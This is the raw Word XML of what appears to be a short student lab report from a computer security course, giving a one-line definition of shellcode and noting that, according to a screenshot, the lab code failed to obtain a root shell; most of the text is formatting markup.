    <w:p w:rsidR="00F03369" w:rsidRPr="00762FF0" w:rsidRDefault="00F03369" w:rsidP="00F03369">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shellcode通常是软件漏洞利用过程中使用一小段机器代码，之所以称为shellcode，是因为它启动一个命令界面，让攻击控制整个机器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487007" w:rsidRPr="00762FF0" w:rsidRDefault="00487007" w:rsidP="00487007">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>由图片可得</w:t>
      </w:r>
      <w:r w:rsidR="00F03369" w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该代码无法运行，不可以获得root</w:t>
      </w:r>
      <w:r w:rsidR="00F03369" w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F03369" w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487007" w:rsidRPr="00487007" w:rsidRDefault="00487007" w:rsidP="00487007">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="100" w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487007">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5257800" cy="2040340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片 7" descr="X:\Users\WuRuiXin\AppData\Roaming\Tencent\Users\3468355794\TIM\WinTemp\RichOle\{9Y5QPOSU9OPT)U57(@OH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sers\WuRuiXin\AppData\Roaming\Tencent\Users\3468355794\TIM\WinTemp\RichOle\{9Y5QPOSU9OPT)U57(@OHQ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546" cy="2045674"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487007" w:rsidRPr="00487007" w:rsidRDefault="00487007" w:rsidP="008E51CD">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="300" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00487007" w:rsidRPr="0048700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46" w:rsidRDefault="005C2346" w:rsidP="005D0D51">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005C2346" w:rsidRDefault="005C2346" w:rsidP="005D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46" w:rsidRDefault="005C2346" w:rsidP="005D0D51">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005C2346" w:rsidRDefault="005C2346" w:rsidP="005D0D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10E" w:rsidRPr="005D0D51" w:rsidRDefault="0091510E" w:rsidP="00897EC4">
    <w:pPr>
      <w:pStyle w:val="a3"/>
      <w:jc w:val="left"/>
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="005D0D51">
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>Laboratory for Computer Security Education</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidRPr="002C3549">
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="002C3549">
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r w:rsidRPr="002C3549">
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00826175" w:rsidRPr="00826175">
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t>3</w:t>
    </w:r>
    <w:r w:rsidRPr="002C3549">
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>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1A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B423DF0"/>
    <w:lvl w:ilvl="0" w:tplc="A8265D8A">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="885" w:hanging="465"/>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1700C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6916E8B2"/>
    <w:lvl w:ilvl="0" w:tplc="D2B4BF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32F46"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A0E876C"/>
    <w:lvl w:ilvl="0" w:tplc="4E789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66204"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8A07910"/>
    <w:lvl w:ilvl="0" w:tplc="A38C99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85384E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="092C572C"/>
    <w:lvl w:ilvl="0" w:tplc="65A29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BB59FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F370D40C"/>
    <w:lvl w:ilvl="0" w:tplc="E3724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831BCB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="74B26B6E"/>
    <w:lvl w:ilvl="0" w:tplc="9BB0357E">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="885" w:hanging="465"/>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20189F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="850CBDFC"/>
    <w:lvl w:ilvl="0" w:tplc="CA62C942">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F25BDF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA9CDB4C"/>
    <w:lvl w:ilvl="0" w:tplc="876A6D6A">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3523C79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA3C0A98"/>
    <w:lvl w:ilvl="0" w:tplc="D5B41270">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EF356DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4EF4748C"/>
    <w:lvl w:ilvl="0" w:tplc="42BA29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3561CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3C2A2F6"/>
    <w:lvl w:ilvl="0" w:tplc="C0B8E8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80822E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="69788662"/>
    <w:lvl w:ilvl="0" w:tplc="414680D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10"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="9"/>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B2"/>
    <w:rsid w:val="00062F68"/>
    <w:rsid w:val="000C3873"/>
    <w:rsid w:val="000C77D9"/>
    <w:rsid w:val="00105F5E"/>
    <w:rsid w:val="00146043"/>
    <w:rsid w:val="00146E0D"/>
    <w:rsid w:val="001A4416"/>
    <w:rsid w:val="001F3096"/>
    <w:rsid w:val="002979AE"/>
    <w:rsid w:val="002C3549"/>
    <w:rsid w:val="002E6282"/>
    <w:rsid w:val="00320B4D"/>
    <w:rsid w:val="00326DBE"/>
    <w:rsid w:val="0038104E"/>
    <w:rsid w:val="003A454F"/>
    <w:rsid w:val="003C2BF2"/>
    <w:rsid w:val="00436832"/>
    <w:rsid w:val="004508E9"/>
    <w:rsid w:val="00487007"/>
    <w:rsid w:val="004E42B2"/>
    <w:rsid w:val="004F5F7E"/>
    <w:rsid w:val="00503529"/>
    <w:rsid w:val="00537ADA"/>
    <w:rsid w:val="00544A24"/>
    <w:rsid w:val="00544C19"/>
    <w:rsid w:val="00575A08"/>
    <w:rsid w:val="0059677B"/>
    <w:rsid w:val="005C2346"/>
    <w:rsid w:val="005D0D51"/>
    <w:rsid w:val="00612FE0"/>
    <w:rsid w:val="00617B21"/>
    <w:rsid w:val="00670D86"/>
    <w:rsid w:val="006750DE"/>
    <w:rsid w:val="006762EB"/>
    <w:rsid w:val="0069286E"/>
    <w:rsid w:val="006B0D28"/>
    <w:rsid w:val="006E08BB"/>
    <w:rsid w:val="006E52B8"/>
    <w:rsid w:val="006E712B"/>
    <w:rsid w:val="006F5AA8"/>
    <w:rsid w:val="00714451"/>
    <w:rsid w:val="00732EAA"/>
    <w:rsid w:val="00762FF0"/>
    <w:rsid w:val="007C41DE"/>
    <w:rsid w:val="00826175"/>
    <w:rsid w:val="00897EC4"/>
    <w:rsid w:val="008B0776"/>
    <w:rsid w:val="008E51CD"/>
    <w:rsid w:val="008F501A"/>
    <w:rsid w:val="0091510E"/>
    <w:rsid w:val="0091644A"/>
    <w:rsid w:val="009434C4"/>
    <w:rsid w:val="00944415"/>
    <w:rsid w:val="009644C3"/>
    <w:rsid w:val="00975509"/>
    <w:rsid w:val="00986A47"/>
    <w:rsid w:val="009A4104"/>
    <w:rsid w:val="009D57F4"/>
    <w:rsid w:val="009F1DE7"/>
    <w:rsid w:val="009F3CC7"/>
    <w:rsid w:val="00A421E4"/>
    <w:rsid w:val="00A630AE"/>
    <w:rsid w:val="00AA5367"/>
    <w:rsid w:val="00AC1A70"/>
    <w:rsid w:val="00B1166E"/>
    <w:rsid w:val="00B27CBE"/>
    <w:rsid w:val="00B610ED"/>
    <w:rsid w:val="00B745BC"/>
    <w:rsid w:val="00C46BEC"/>
    <w:rsid w:val="00C93C07"/>
    <w:rsid w:val="00CD4C83"/>
    <w:rsid w:val="00D04E55"/>
    <w:rsid w:val="00D35788"/>
    <w:rsid w:val="00D420E9"/>
    <w:rsid w:val="00D47BD1"/>
    <w:rsid w:val="00D523A8"/>
    <w:rsid w:val="00D73E12"/>
    <w:rsid w:val="00E16942"/>
    <w:rsid w:val="00E31285"/>
    <w:rsid w:val="00E47241"/>
    <w:rsid w:val="00E66E31"/>
    <w:rsid w:val="00E83242"/>
    <w:rsid w:val="00EA5A74"/>
    <w:rsid w:val="00EC4E20"/>
    <w:rsid w:val="00EF14C8"/>
    <w:rsid w:val="00F02976"/>
    <w:rsid w:val="00F03369"/>
    <w:rsid w:val="00F10459"/>
    <w:rsid w:val="00F754B7"/>
    <w:rsid w:val="00FD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A98EC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{04279534-049C-41CB-99B4-6CA9C7E7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16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D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D51"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D0D51"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005D0D51"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="002C3549"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B27CBE"/>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9A4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50352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03529"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00062F68"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B1166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784">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1089353151">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="36198730">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="132598838">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1022436865">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="139268238">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="223417893">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="147595043">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="81803498">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="151214838">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="217134661">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="162939040">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2095544132">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="185022076">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2127849643">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="320043490">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1006323878">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="341860738">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1978682901">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="465245178">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1307203034">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="481580462">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1813785560">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="491215242">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="497843309">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
